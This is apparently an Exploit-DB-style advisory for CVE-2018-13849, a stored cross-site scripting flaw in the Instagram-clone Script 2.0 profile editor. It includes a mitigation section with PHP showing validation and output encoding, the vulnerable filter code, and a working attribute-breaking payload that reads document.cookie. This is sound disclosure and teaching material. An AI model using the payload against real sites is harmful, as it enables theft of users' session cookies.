Vendor: Instagram-clone
Author: L0RD
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross-Site Scripting)
Product Name: Instagram-clone
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
CVE: CVE-2018-13849
CPE: 2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
Year: 2018

Instagram-clone Script 2.0 – Cross-Site Scripting

Instagram-clone Script 2.0 is vulnerable to Cross-Site Scripting. This vulnerability is due to insufficient sanitization of user-supplied input in the 'edit_requests.php' file. An attacker can exploit this vulnerability to execute arbitrary HTML and script code in the browser of the victim in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

All user-supplied profile fields should be validated against an allow-list of expected characters and formats before they are stored, and rejected when they do not match. Removing only the '<' and '>' characters, as the vulnerable filter does, is not sufficient: quotes and '=' survive, which is what the payload below relies on to break out of an HTML attribute. Stored values must additionally be encoded for the context in which they are rendered (HTML-entity encoding, including quotes, when written into page content or attribute values) so that stored profile data is never interpreted as script.
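The following PHP is an added example written for this page; it is not code from the advisory or from the Instagram-clone project. It places the advisory's character-stripping filter beside the two controls the mitigation calls for: allow-list validation on input and context-aware encoding on output. The function names (weak_filter, validate_username, validate_url, validate_bio, html_attr) and the length and character-set limits are assumptions chosen for illustration.

```php
<?php
// Added example (not part of the advisory or the Instagram-clone project).
// Function names, limits and the sample input are assumptions.

// The advisory's filter: removes only '<' and '>'. Double quotes, '=' and
// spaces survive, so a stored value can still close an HTML attribute.
function weak_filter(string $value): string {
    return (string) preg_replace("#[<>]#i", "", $value);
}

// Validation: reject, do not repair. Usernames are limited to a
// conservative character set (assumed policy); a non-matching value
// returns null so the caller can respond with an error instead of saving.
function validate_username(string $value): ?string {
    return preg_match('/^[A-Za-z0-9_.]{1,30}$/', $value) === 1 ? $value : null;
}

// Link fields (instagram, youtube, facebook, twitter, website) must be
// absolute http(s) URLs; an empty value is allowed for an optional field.
function validate_url(string $value): ?string {
    if ($value === '') {
        return '';
    }
    if (filter_var($value, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $value : null;
}

// Free-text bio: accepted as-is but bounded in size (byte length, assumed
// limit); its safety comes from encoding at render time, not from stripping.
function validate_bio(string $value): ?string {
    return strlen($value) <= 500 ? $value : null;
}

// Output encoding for HTML body text or a double-quoted attribute value.
// ENT_QUOTES encodes both ' and ", which is exactly what the stripping
// filter leaves untouched.
function html_attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample input with the shape of the advisory's payload.
$payload = '"onmouseover="alert(document.cookie)';

// Weak path: the quotes survive the filter, so when the stored value is
// written into value="..." the attribute closes early and the remainder is
// parsed as a new attribute.
$weak = '<input value="' . weak_filter($payload) . '">';

// Hardened path, step 1: validation rejects the value as a username.
$accepted = validate_username($payload);

// Hardened path, step 2: even a field that accepts free text (bio) is
// entity-encoded when rendered, so the quotes cannot terminate the attribute.
$safe = '<input value="' . html_attr($payload) . '">';

echo "weak:     ", $weak, PHP_EOL;
echo "encoded:  ", $safe, PHP_EOL;
echo "username: ";
var_dump($accepted);
```

Run with the PHP CLI (php example.php). The first line shows the attribute broken at the first surviving double quote; in the second line every double quote has become &quot; and the input is rendered as plain text inside the attribute; the username check prints NULL, meaning the value would be rejected before it ever reached saveProfileEditing.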

Exploit-DB raw data:

# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
# Date: 2018-07-10
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# CVE: CVE-2018-13849
# Tested on: Kali Linux

# PoC: persistent cross-site scripting
# Vulnerable file: edit_requests.php
# Vulnerable code:

if (isset($_POST['username'])) {
    $username  = preg_replace("#[<> ]#i", "", $_POST['username']);
    $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
    $surname   = preg_replace("#[<> ]#i", "", $_POST['surname']);
    $bio       = preg_replace("#[<>]#i", "", $_POST['bio']);
    $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
    $youtube   = preg_replace("#[<>]#i", "", $_POST['youtube']);
    $facebook  = preg_replace("#[<>]#i", "", $_POST['facebook']);
    $twitter   = preg_replace("#[<>]#i", "", $_POST['twitter']);
    $website   = preg_replace("#[<>]#i", "", $_POST['website']);
    $mobile    = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
    $tags      = preg_replace("#[\s]#", "-", $_POST['tags']);
    $session   = $_SESSION['id'];

    $m = $edit->saveProfileEditing($username, $firstname, $surname, $bio,
        $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
    $array = array("mssg" => $m);
    echo json_encode($array);
}

# We use this payload to bypass the filter:
# Payload:

"onmouseover=" alert(document.cookie)